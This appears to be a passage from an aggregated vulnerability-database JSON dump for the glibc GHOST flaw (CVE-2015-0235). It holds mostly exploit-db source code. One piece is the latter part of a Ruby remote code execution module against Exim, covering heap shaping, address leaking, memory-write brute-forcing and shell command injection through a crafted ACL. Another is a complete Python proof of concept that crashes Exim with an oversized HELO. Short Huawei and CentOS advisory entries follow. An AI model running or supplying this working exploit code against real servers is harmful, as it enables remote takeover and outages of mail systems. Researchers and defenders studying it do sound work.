<=> a[1] }\r\n error_count = error_count.first # most frequent\r\n error = error_count[0]\r\n count = error_count[1]\r\n throw(:another_heap_shift) unless count >= 6 # majority\r\n leaked_addr.push({ error: error, shift: heap_shift })\r\n\r\n # common-case shortcut\r\n if (leaked_arch == ARCH_X86 and error[0,4] == error[4,4] and error[8..-1] == \"er not yet given\") or\r\n (leaked_arch == ARCH_X86_64 and error.length == 6 and error[5].count(\"\\x7E-\\x7F\").nonzero?)\r\n leaked_addr = [leaked_addr.last] # use this one, and not another\r\n throw(:another_heap_shift, true) # done\r\n end\r\n throw(:another_heap_shift)\r\n end\r\n throw(:another_heap_shift)\r\n end\r\n break if done\r\n end\r\n\r\n fail_with(\"infoleak\", \"not vuln? old glibc? 
(no leaked_arch)\") if leaked_arch.nil?\r\n fail_with(\"infoleak\", \"NUL, CR, LF in addr? (no leaked_addr)\") if leaked_addr.empty?\r\n\r\n leaked_addr.sort! { |a, b| b[:error].length <=> a[:error].length }\r\n leaked_addr = leaked_addr.first # longest\r\n error = leaked_addr[:error]\r\n shift = leaked_addr[:shift]\r\n\r\n leaked_addr = 0\r\n (leaked_arch == ARCH_X86 ? 4 : 8).times do |i|\r\n break if i >= error.length\r\n leaked_addr += error.unpack('C*')[i] * (2**(i*8))\r\n end\r\n # leaked_addr should point to the beginning of Exim's smtp_cmd_buffer:\r\n leaked_addr -= 2*SMTP_CMD_BUFFER_SIZE + IN_BUFFER_SIZE + 4*(11*1024+shift) + 3*1024 + STORE_BLOCK_SIZE\r\n fail_with(\"infoleak\", \"NUL, CR, LF in addr? (no leaked_addr)\") if leaked_addr <= MMAP_MIN_ADDR\r\n\r\n print_good(\"Successfully leaked_arch: #{leaked_arch}\")\r\n print_good(\"Successfully leaked_addr: #{leaked_addr.to_s(16)}\")\r\n @leaked = { arch: leaked_arch, addr: leaked_addr }\r\n end\r\n\r\n def try_information_leak(heap_shift, write_offset, last_digit = 9)\r\n fail_with(\"infoleak\", \"heap_shift\") if (heap_shift < MIN_HEAP_SHIFT)\r\n fail_with(\"infoleak\", \"heap_shift\") if (heap_shift & 15) != 0\r\n fail_with(\"infoleak\", \"write_offset\") if (write_offset & 7) != 0\r\n fail_with(\"infoleak\", \"last_digit\") if \"#{last_digit}\" !~ /\\A[0-9]\\z/\r\n\r\n smtp_connect\r\n\r\n # bulletproof Heap Feng Shui; the hard part is avoiding:\r\n # \"Too many syntax or protocol errors\" (3)\r\n # \"Too many unrecognized commands\" (3)\r\n # \"Too many nonmail commands\" (10)\r\n\r\n smtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 11*1024+13-1 + heap_shift)\r\n smtp_recv(250)\r\n\r\n smtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 3*1024+13-1)\r\n smtp_recv(250)\r\n\r\n smtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 3*1024+16+13-1)\r\n smtp_recv(250)\r\n\r\n smtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 8*1024+16+13-1)\r\n smtp_recv(250)\r\n\r\n 
smtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 5*1024+16+13-1)\r\n smtp_recv(250)\r\n\r\n # overflow (3 bytes) gethostbyname's buffer, and\r\n # overwrite its next_chunk's size field with 0x003?31\r\n # ^ last_digit\r\n smtp_send(\"HELO \", \"\", \"0\", \".1#{last_digit}\", \"\", 12*1024+3-1 + heap_shift-MIN_HEAP_SHIFT)\r\n begin # ^ 0x30 | PREV_INUSE\r\n smtp_recv(HELO_CODES)\r\n\r\n smtp_send(\"RSET\")\r\n smtp_recv(250)\r\n\r\n smtp_send(\"RCPT TO:\", \"\", method(:rand_text_alpha), \"\\x7F\", \"\", 15*1024)\r\n smtp_recv(503, 'sender not yet given')\r\n\r\n smtp_send(\"\", \"BAD1 \", method(:rand_text_alpha), \"\\x7F\\x7F\\x7F\\x7F\", \"\", 10*1024-16-1 + write_offset)\r\n smtp_recv(500, '\\A500 unrecognized command\\r\\n\\z')\r\n\r\n smtp_send(\"BAD2 \", \"\", method(:rand_text_alpha), \"\\x7F\", \"\", 15*1024)\r\n smtp_recv(500, '\\A500 unrecognized command\\r\\n\\z')\r\n\r\n smtp_send(\"DATA\")\r\n reply = smtp_recv(503)\r\n\r\n lines = reply[:lines]\r\n fail if lines.size <= 3\r\n fail if lines[+0] != \"503-All RCPT commands were rejected with this error:\\r\\n\"\r\n fail if lines[-2] != \"503-valid RCPT command must precede DATA\\r\\n\"\r\n fail if lines[-1] != \"503 Too many syntax or protocol errors\\r\\n\"\r\n\r\n # if leaked_addr contains LF, reverse smtp_respond()'s multiline splitting\r\n # (the \"while (isspace(*msg)) msg++;\" loop can't be easily reversed,\r\n # but happens with lower probability)\r\n\r\n error = lines[+1..-3].join(\"\")\r\n error.sub!(/\\A503-/mn, \"\")\r\n error.sub!(/\\r\\n\\z/mn, \"\")\r\n error.gsub!(/\\r\\n503-/mn, \"\\n\")\r\n return error\r\n\r\n rescue\r\n return nil\r\n end\r\n\r\n ensure\r\n smtp_disconnect\r\n end\r\n\r\n def code_execution\r\n print_status(\"Trying code execution...\")\r\n\r\n # can't \"${run{/bin/sh -c 'exec /bin/sh -i <&#{b} >&0 2>&0'}} \" anymore:\r\n # DW/26 Set FD_CLOEXEC on SMTP sockets after forking in the daemon, to ensure\r\n # that rogue child processes cannot use them.\r\n\r\n 
fail_with(\"codeexec\", \"encoded payload\") if payload.raw != payload.encoded\r\n fail_with(\"codeexec\", \"invalid payload\") if payload.raw.empty? or payload.raw.count(\"^\\x20-\\x7E\").nonzero?\r\n # Exim processes our run-ACL with expand_string() first (hence the [\\$\\{\\}\\\\] escapes),\r\n # and transport_set_up_command(), string_dequote() next (hence the [\\\"\\\\] escapes).\r\n encoded = payload.raw.gsub(/[\\\"\\\\]/, '\\\\\\\\\\\\&').gsub(/[\\$\\{\\}\\\\]/, '\\\\\\\\\\\\&')\r\n # setsid because of Exim's \"killpg(pid, SIGKILL);\" after \"alarm(60);\"\r\n command = '${run{/usr/bin/env setsid /bin/sh -c \"' + encoded + '\"}}'\r\n print_debug(command)\r\n\r\n # don't try to execute commands directly, try a very simple ACL first,\r\n # to distinguish between exploitation-problems and shellcode-problems\r\n\r\n acldrop = \"drop message=\"\r\n message = rand_text_alpha(command.length - acldrop.length)\r\n acldrop += message\r\n\r\n max_rand_offset = (@leaked[:arch] == ARCH_X86 ? 32 : 64)\r\n max_heap_addr = @leaked[:addr]\r\n min_heap_addr = nil\r\n survived = nil\r\n\r\n # we later fill log_buffer and big_buffer with alpha chars,\r\n # which creates a safe-zone at the beginning of the heap,\r\n # where we can't possibly crash during our brute-force\r\n\r\n # 4, because 3 copies of sender_helo_name, and step_len;\r\n # start big, but refine little by little in case\r\n # we crash because we overwrite important data\r\n\r\n helo_len = (LOG_BUFFER_SIZE + BIG_BUFFER_SIZE) / 4\r\n loop do\r\n\r\n sender_helo_name = \"A\" * helo_len\r\n address = sprintf(\"[%s]:%d\", @sender[:hostaddr], 65535)\r\n\r\n # the 3 copies of sender_helo_name, allocated by\r\n # host_build_sender_fullhost() in POOL_PERM memory\r\n\r\n helo_ip_size = ALIGNMENT +\r\n sender_helo_name[+1..-2].length\r\n\r\n sender_fullhost_size = ALIGNMENT +\r\n sprintf(\"%s (%s) %s\", @sender[:hostname], sender_helo_name, address).length\r\n\r\n sender_rcvhost_size = ALIGNMENT + ((@sender[:ident] == nil) 
?\r\n sprintf(\"%s (%s helo=%s)\", @sender[:hostname], address, sender_helo_name) :\r\n sprintf(\"%s\\n\\t(%s helo=%s ident=%s)\", @sender[:hostname], address, sender_helo_name, @sender[:ident])\r\n ).length\r\n\r\n # fit completely into the safe-zone\r\n step_len = (LOG_BUFFER_SIZE + BIG_BUFFER_SIZE) -\r\n (max_rand_offset + helo_ip_size + sender_fullhost_size + sender_rcvhost_size)\r\n loop do\r\n\r\n # inside smtp_cmd_buffer (we later fill smtp_cmd_buffer and smtp_data_buffer\r\n # with alpha chars, which creates another safe-zone at the end of the heap)\r\n heap_addr = max_heap_addr\r\n loop do\r\n\r\n # try harder the first time around: we obtain better\r\n # heap boundaries, and we usually hit our ACL faster\r\n\r\n (min_heap_addr ? 1 : 2).times do\r\n\r\n # try the same heap_addr several times, but with different random offsets,\r\n # in case we crash because our hijacked storeblock's length field is too small\r\n # (we don't control what's stored at heap_addr)\r\n\r\n rand_offset = rand(max_rand_offset)\r\n print_debug(\"#{{ helo: helo_len, step: step_len, addr: heap_addr.to_s(16), offset: rand_offset }}\")\r\n reply = try_code_execution(helo_len, acldrop, heap_addr + rand_offset)\r\n print_debug(\"#{{ reply: reply }}\") if reply\r\n\r\n if reply and\r\n reply[:code] == \"550\" and\r\n # detect the parsed ACL, not the \"still in text form\" ACL (with \"=\")\r\n reply[:lines].join(\"\").delete(\"^=A-Za-z\") =~ /(\\A|[^=])#{message}/mn\r\n print_good(\"Brute-force SUCCESS\")\r\n print_good(\"Please wait for reply...\")\r\n # execute command this time, not acldrop\r\n reply = try_code_execution(helo_len, command, heap_addr + rand_offset)\r\n print_debug(\"#{{ reply: reply }}\")\r\n return handler\r\n end\r\n\r\n if not min_heap_addr\r\n if reply\r\n fail_with(\"codeexec\", \"no min_heap_addr\") if (max_heap_addr - heap_addr) >= MAX_HEAP_SIZE\r\n survived = heap_addr\r\n else\r\n if ((survived ? 
survived : max_heap_addr) - heap_addr) >= MIN_HEAP_SIZE\r\n # survived should point to our safe-zone at the beginning of the heap\r\n fail_with(\"codeexec\", \"never survived\") if not survived\r\n print_good \"Brute-forced min_heap_addr: #{survived.to_s(16)}\"\r\n min_heap_addr = survived\r\n end\r\n end\r\n end\r\n end\r\n\r\n heap_addr -= step_len\r\n break if min_heap_addr and heap_addr < min_heap_addr\r\n end\r\n\r\n break if step_len < 1024\r\n step_len /= 2\r\n end\r\n\r\n helo_len /= 2\r\n break if helo_len < 1024\r\n # ^ otherwise the 3 copies of sender_helo_name will\r\n # fit into the current_block of POOL_PERM memory\r\n end\r\n fail_with(\"codeexec\", \"Brute-force FAILURE\")\r\n end\r\n\r\n # our write-what-where primitive\r\n def try_code_execution(len, what, where)\r\n fail_with(\"codeexec\", \"#{what.length} >= #{len}\") if what.length >= len\r\n fail_with(\"codeexec\", \"#{where} < 0\") if where < 0\r\n\r\n x86 = (@leaked[:arch] == ARCH_X86)\r\n min_heap_shift = (x86 ? 
512 : 768) # at least request2size(sizeof(FILE))\r\n heap_shift = min_heap_shift + rand(1024 - min_heap_shift)\r\n last_digit = 1 + rand(9)\r\n\r\n smtp_connect\r\n\r\n # fill smtp_cmd_buffer, smtp_data_buffer, and big_buffer with alpha chars\r\n smtp_send(\"MAIL FROM:\", \"\", method(:rand_text_alpha), \"<#{rand_text_alpha_upper(8)}>\", \"\", BIG_BUFFER_SIZE -\r\n \"501 : sender address must contain a domain\\r\\n\\0\".length)\r\n smtp_recv(501, 'sender address must contain a domain')\r\n\r\n smtp_send(\"RSET\")\r\n smtp_recv(250)\r\n\r\n # bulletproof Heap Feng Shui; the hard part is avoiding:\r\n # \"Too many syntax or protocol errors\" (3)\r\n # \"Too many unrecognized commands\" (3)\r\n # \"Too many nonmail commands\" (10)\r\n\r\n # / 5, because \"\\x7F\" is non-print, and:\r\n # ss = store_get(length + nonprintcount * 4 + 1);\r\n smtp_send(\"BAD1 \", \"\", \"\\x7F\", \"\", \"\", (19*1024 + heap_shift) / 5)\r\n smtp_recv(500, '\\A500 unrecognized command\\r\\n\\z')\r\n\r\n smtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 5*1024+13-1)\r\n smtp_recv(250)\r\n\r\n smtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 3*1024+13-1)\r\n smtp_recv(250)\r\n\r\n smtp_send(\"BAD2 \", \"\", \"\\x7F\", \"\", \"\", (13*1024 + 128) / 5)\r\n smtp_recv(500, '\\A500 unrecognized command\\r\\n\\z')\r\n\r\n smtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 3*1024+16+13-1)\r\n smtp_recv(250)\r\n\r\n # overflow (3 bytes) gethostbyname's buffer, and\r\n # overwrite its next_chunk's size field with 0x003?31\r\n # ^ last_digit\r\n smtp_send(\"EHLO \", \"\", \"0\", \".1#{last_digit}\", \"\", 5*1024+64+3-1)\r\n smtp_recv(HELO_CODES) # ^ 0x30 | PREV_INUSE\r\n\r\n # auth_xtextdecode() is the only way to overwrite the beginning of a\r\n # current_block of memory (the \"storeblock\" structure) with arbitrary data\r\n # (so that our hijacked \"next\" pointer can contain NUL, CR, LF characters).\r\n # this shapes the rest of our exploit: we overwrite the 
beginning of the\r\n # current_block of POOL_PERM memory with the current_block of POOL_MAIN\r\n # memory (allocated by auth_xtextdecode()).\r\n\r\n auth_prefix = rand_text_alpha(x86 ? 11264 : 11280)\r\n (x86 ? 4 : 8).times { |i| auth_prefix += sprintf(\"+%02x\", (where >> (i*8)) & 255) }\r\n auth_prefix += \".\"\r\n\r\n # also fill log_buffer with alpha chars\r\n smtp_send(\"MAIL FROM:<> AUTH=\", auth_prefix, method(:rand_text_alpha), \"+\", \"\", 0x3030)\r\n smtp_recv(501, 'invalid data for AUTH')\r\n\r\n smtp_send(\"HELO \", \"[1:2:3:4:5:6:7:8%eth0:\", \" \", \"#{what}]\", \"\", len)\r\n begin\r\n reply = smtp_recv(ANY_CODE)\r\n return reply if reply[:code] !~ /#{HELO_CODES}/\r\n return reply if reply[:code] != \"250\" and reply[:lines].first !~ /argument does not match calling host/\r\n\r\n smtp_send(\"MAIL FROM:<>\")\r\n reply = smtp_recv(ANY_CODE)\r\n return reply if reply[:code] != \"250\"\r\n\r\n smtp_send(\"RCPT TO:<postmaster>\")\r\n reply = smtp_recv\r\n return reply\r\n\r\n rescue\r\n return nil\r\n end\r\n\r\n ensure\r\n smtp_disconnect\r\n end\r\n\r\n DIGITS = '([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])'\r\n DOT = '[.]'\r\n\r\n def smtp_connect(exploiting = true)\r\n fail_with(\"smtp_connect\", \"sock isn't nil\") if sock\r\n\r\n connect\r\n fail_with(\"smtp_connect\", \"sock is nil\") if not sock\r\n @smtp_state = :recv\r\n\r\n banner = smtp_recv(220)\r\n return if not exploiting\r\n\r\n sender_host_address = datastore['SENDER_HOST_ADDRESS']\r\n if sender_host_address !~ /\\A#{DIGITS}#{DOT}#{DIGITS}#{DOT}#{DIGITS}#{DOT}#{DIGITS}\\z/\r\n fail_with(\"smtp_connect\", \"bad SENDER_HOST_ADDRESS (nil)\") if sender_host_address.nil?\r\n fail_with(\"smtp_connect\", \"bad SENDER_HOST_ADDRESS (not in IPv4 dotted-decimal notation)\")\r\n end\r\n sender_host_address_octal = \"0\" + $1.to_i.to_s(8) + \".#{$2}.#{$3}.#{$4}\"\r\n\r\n # turn helo_seen on (enable the MAIL command)\r\n # call smtp_verify_helo() (force fopen() and small malloc()s)\r\n # call 
host_find_byname() (force gethostbyname's initial 1024-byte malloc())\r\n smtp_send(\"HELO #{sender_host_address_octal}\")\r\n reply = smtp_recv(HELO_CODES)\r\n\r\n if reply[:code] != \"250\"\r\n fail_with(\"smtp_connect\", \"not Exim?\") if reply[:lines].first !~ /argument does not match calling host/\r\n fail_with(\"smtp_connect\", \"bad SENDER_HOST_ADDRESS (helo_verify_hosts)\")\r\n end\r\n\r\n if reply[:lines].first =~ /\\A250 (\\S*) Hello (.*) \\[(\\S*)\\]\\r\\n\\z/mn\r\n fail_with(\"smtp_connect\", \"bad SENDER_HOST_ADDRESS (helo_try_verify_hosts)\") if sender_host_address != $3\r\n smtp_active_hostname = $1\r\n sender_host_name = $2\r\n\r\n if sender_host_name =~ /\\A(.*) at (\\S*)\\z/mn\r\n sender_host_name = $2\r\n sender_ident = $1\r\n else\r\n sender_ident = nil\r\n end\r\n fail_with(\"smtp_connect\", \"bad SENDER_HOST_ADDRESS (no FCrDNS)\") if sender_host_name == sender_host_address_octal\r\n\r\n else\r\n # can't double-check sender_host_address here, so only for advanced users\r\n fail_with(\"smtp_connect\", \"user-supplied EHLO greeting\") unless datastore['I_KNOW_WHAT_I_AM_DOING']\r\n # worst-case scenario\r\n smtp_active_hostname = \"A\" * NS_MAXDNAME\r\n sender_host_name = \"A\" * NS_MAXDNAME\r\n sender_ident = \"A\" * 127 * 4 # sender_ident = string_printing(string_copyn(p, 127));\r\n end\r\n\r\n _sender = @sender\r\n @sender = {\r\n hostaddr: sender_host_address,\r\n hostaddr8: sender_host_address_octal,\r\n hostname: sender_host_name,\r\n ident: sender_ident,\r\n __smtp_active_hostname: smtp_active_hostname\r\n }\r\n fail_with(\"smtp_connect\", \"sender changed\") if _sender and _sender != @sender\r\n\r\n # avoid a future pathological case by forcing it now:\r\n # \"Do NOT free the first successor, if our current block has less than 256 bytes left.\"\r\n smtp_send(\"MAIL FROM:\", \"<\", method(:rand_text_alpha), \">\", \"\", STOREPOOL_MIN_SIZE + 16)\r\n smtp_recv(501, 'sender address must contain a domain')\r\n\r\n smtp_send(\"RSET\")\r\n 
smtp_recv(250, 'Reset OK')\r\n end\r\n\r\n def smtp_send(prefix, arg_prefix = nil, arg_pattern = nil, arg_suffix = nil, suffix = nil, arg_length = nil)\r\n fail_with(\"smtp_send\", \"state is #{@smtp_state}\") if @smtp_state != :send\r\n @smtp_state = :sending\r\n\r\n if not arg_pattern\r\n fail_with(\"smtp_send\", \"prefix is nil\") if not prefix\r\n fail_with(\"smtp_send\", \"param isn't nil\") if arg_prefix or arg_suffix or suffix or arg_length\r\n command = prefix\r\n\r\n else\r\n fail_with(\"smtp_send\", \"param is nil\") unless prefix and arg_prefix and arg_suffix and suffix and arg_length\r\n length = arg_length - arg_prefix.length - arg_suffix.length\r\n fail_with(\"smtp_send\", \"len is #{length}\") if length <= 0\r\n argument = arg_prefix\r\n case arg_pattern\r\n when String\r\n argument += arg_pattern * (length / arg_pattern.length)\r\n argument += arg_pattern[0, length % arg_pattern.length]\r\n when Method\r\n argument += arg_pattern.call(length)\r\n end\r\n argument += arg_suffix\r\n fail_with(\"smtp_send\", \"arglen is #{argument.length}, not #{arg_length}\") if argument.length != arg_length\r\n command = prefix + argument + suffix\r\n end\r\n\r\n fail_with(\"smtp_send\", \"invalid char in cmd\") if command.count(\"^\\x20-\\x7F\") > 0\r\n fail_with(\"smtp_send\", \"cmdlen is #{command.length}\") if command.length > SMTP_CMD_BUFFER_SIZE\r\n command += \"\\n\" # RFC says CRLF, but squeeze as many chars as possible in smtp_cmd_buffer\r\n\r\n # the following loop works around a bug in the put() method:\r\n # \"while (send_idx < send_len)\" should be \"while (send_idx < buf.length)\"\r\n # (or send_idx and/or send_len could be removed altogether, like here)\r\n\r\n while command and not command.empty?\r\n num_sent = sock.put(command)\r\n fail_with(\"smtp_send\", \"sent is #{num_sent}\") if num_sent <= 0\r\n fail_with(\"smtp_send\", \"sent is #{num_sent}, greater than #{command.length}\") if num_sent > command.length\r\n command = command[num_sent..-1]\r\n 
end\r\n\r\n @smtp_state = :recv\r\n end\r\n\r\n def smtp_recv(expected_code = nil, expected_data = nil)\r\n fail_with(\"smtp_recv\", \"state is #{@smtp_state}\") if @smtp_state != :recv\r\n @smtp_state = :recving\r\n\r\n failure = catch(:failure) do\r\n\r\n # parse SMTP replies very carefully (the information\r\n # leak injects arbitrary data into multiline replies)\r\n\r\n data = \"\"\r\n while data !~ /(\\A|\\r\\n)[0-9]{3}[ ].*\\r\\n\\z/mn\r\n begin\r\n more_data = sock.get_once\r\n rescue\r\n throw(:failure, \"Caught #{$!.class}: #{$!.message}\")\r\n end\r\n throw(:failure, \"no more data\") if more_data.nil?\r\n throw(:failure, \"no more data\") if more_data.empty?\r\n data += more_data\r\n end\r\n\r\n throw(:failure, \"malformed reply (count)\") if data.count(\"\\0\") > 0\r\n lines = data.scan(/(?:\\A|\\r\\n)[0-9]{3}[ -].*?(?=\\r\\n(?=[0-9]{3}[ -]|\\z))/mn)\r\n throw(:failure, \"malformed reply (empty)\") if lines.empty?\r\n\r\n code = nil\r\n lines.size.times do |i|\r\n lines[i].sub!(/\\A\\r\\n/mn, \"\")\r\n lines[i] += \"\\r\\n\"\r\n\r\n if i == 0\r\n code = lines[i][0,3]\r\n throw(:failure, \"bad code\") if code !~ /\\A[0-9]{3}\\z/mn\r\n if expected_code and code !~ /\\A(#{expected_code})\\z/mn\r\n throw(:failure, \"unexpected #{code}, expected #{expected_code}\")\r\n end\r\n end\r\n\r\n line_begins_with = lines[i][0,4]\r\n line_should_begin_with = code + (i == lines.size-1 ? 
\" \" : \"-\")\r\n\r\n if line_begins_with != line_should_begin_with\r\n throw(:failure, \"line begins with #{line_begins_with}, \" \\\r\n \"should begin with #{line_should_begin_with}\")\r\n end\r\n end\r\n\r\n throw(:failure, \"malformed reply (join)\") if lines.join(\"\") != data\r\n if expected_data and data !~ /#{expected_data}/mn\r\n throw(:failure, \"unexpected data\")\r\n end\r\n\r\n reply = { code: code, lines: lines }\r\n @smtp_state = :send\r\n return reply\r\n end\r\n\r\n fail_with(\"smtp_recv\", \"#{failure}\") if expected_code\r\n return nil\r\n end\r\n\r\n def smtp_disconnect\r\n disconnect if sock\r\n fail_with(\"smtp_disconnect\", \"sock isn't nil\") if sock\r\n @smtp_state = :disconnected\r\n end\r\nend", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/36421/"}, {"lastseen": "2016-02-04T02:21:25", "bulletinFamily": "exploit", "description": "Exim ESMTP 4.80 glibc gethostbyname - Denial of Service. CVE-2015-0235. 
Dos exploit for linux platform", "modified": "2015-01-29T00:00:00", "published": "2015-01-29T00:00:00", "id": "EDB-ID:35951", "href": "https://www.exploit-db.com/exploits/35951/", "type": "exploitdb", "title": "Exim ESMTP 4.80 glibc gethostbyname - Denial of Service", "sourceData": "# Exploit Title: [Exim ESMTP GHOST DoS PoC Exploit]\r\n# Date: [1/29/2015]\r\n# Exploit Author: [1N3]\r\n# Vendor Homepage: [www.exim.org]\r\n# Version: [4.80 or less]\r\n# Tested on: [debian-7-7-64b]\r\n# CVE : [2015-0235]\r\n\r\n#!/usr/bin/python\r\n# Exim ESMTP DoS Exploit by 1N3 v20150128\r\n# CVE-2015-0235 GHOST glibc gethostbyname buffer overflow\r\n# http://crowdshield.com\r\n#\r\n# USAGE: python ghost-smtp-dos.py <ip> <port>\r\n#\r\n# Escape character is '^]'.\r\n# 220 debian-7-7-64b ESMTP Exim 4.80 ...\r\n# HELO\r\n# 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\r\n 
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\r\n# Connection closed by foreign host.\r\n#\r\n# user () debian-7-7-64b:~$ dmesg\r\n# ...\r\n# [ 1715.842547] exim4[2562]: segfault at 7fabf1f0ecb8 ip 00007fabef31bd04 sp 00007fffb427d5b0 error 6 in\r\n# libc-2.13.so[7fabef2a2000+182000]\r\n\r\nimport socket\r\nimport time\r\nimport sys, getopt\r\n\r\ndef main(argv):\r\n argc = len(argv)\r\n\r\n if argc <= 1:\r\n print \"usage: %s <host>\" % (argv[0])\r\n sys.exit(0)\r\n\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n buffer = \"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\r\n 
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\r\n target = argv[1] # SET TARGET\r\n port = argv[2] # SET PORT\r\n\r\n print \"(--==== Exim ESMTP DoS Exploit by 1N3 - https://crowdshield.com\"\r\n print \"(--==== Sending GHOST SMTP DoS to \" + target + \":\" + port + \" with length:\" +str(len(buffer))\r\n s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n connect=s.connect((target,int(port)))\r\n data = s.recv(1024)\r\n print \"CONNECTION: \" +data\r\n s.send('HELO ' + buffer + '\\r\\n')\r\n data = s.recv(1024)\r\n print \"received: \" +data\r\n s.send('EHLO ' + buffer + '\\r\\n')\r\n data = s.recv(1024)\r\n print \"received: \" +data\r\n s.close()\r\n\r\nmain(sys.argv) \r\n\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/35951/"}], "huawei": [{"lastseen": "2019-02-01T18:02:36", "bulletinFamily": "software", "description": "Products\n\nSwitches\nRouters\nWLAN\nServers\nSee All\n\n\n\nSolutions\n\nCloud Data Center\nEnterprise Networking\nWireless Private Network\nSolutions by Industry\nSee All\n\n\n\nServices\n\nTraining and Certification\nICT Lifecycle Services\nTechnology Services\nIndustry Solution Services\nSee All\n\n\n\nSee all offerings at e.huawei.com\n\n\n\nNeed Support ?\n\nProduct Support\nSoftware Download\nCommunity\nTools\n\nGo to Full Support", "modified": "2015-03-13T00:00:00", "published": "2015-02-26T00:00:00", "id": "HUAWEI-SA-20150226-01-GLIBC", "href": "https://www.huawei.com/en/psirt/security-advisories/2015/hw-415364", "title": "Security Advisory - Glibc Buffer Overflow Vulnerability", "type": "huawei", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "centos": 
[{"lastseen": "2017-10-03T18:25:12", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2015:0092\n\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread\nlibraries (libpthread), standard math libraries (libm), and the Name\nServer Caching Daemon (nscd) used by multiple programs on the system.\nWithout these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname()\nand gethostbyname2() glibc function calls. A remote attacker able to make\nan application call either of these functions could use this flaw to\nexecute arbitrary code with the permissions of the user running the\napplication. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2015-January/020907.html\nhttp://lists.centos.org/pipermail/centos-announce/2015-January/020908.html\n\n**Affected packages:**\nglibc\nglibc-common\nglibc-devel\nglibc-headers\nglibc-static\nglibc-utils\nnscd\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2015-0092.html", "modified": "2015-01-28T00:30:01", "published": "2015-01-27T23:31:01", "href": "http://lists.centos.org/pipermail/centos-announce/2015-January/020907.html", "id": "CESA-2015:0092", "title": "glibc, nscd security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-10-03T18:26:03", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2015:0090\n\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread\nlibraries (libpthread), standard math libraries (libm), and the 
Name\nServer Caching Daemon (nscd) used by multiple programs on the system.\nWithout these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname()\nand gethostbyname2() glibc function calls. A remote attacker able to make\nan application call either of these functions could use this flaw to\nexecute arbitrary code with the permissions of the user running the\napplication. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2015-January/020906.html\n\n**Affected packages:**\nglibc\nglibc-common\nglibc-devel\nglibc-headers\nglibc-utils\nnscd\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2015-0090.html", "modified": "2015-01-27T22:59:55", "published": "2015-01-27T22:59:55", "href": "http://lists.centos.org/pipermail/centos-announce/2015-January/020906.html", "id": "CESA-2015:0090", "title": "glibc, nscd security update", "type": "centos", "cvss": {"score": 10.0, "vector": 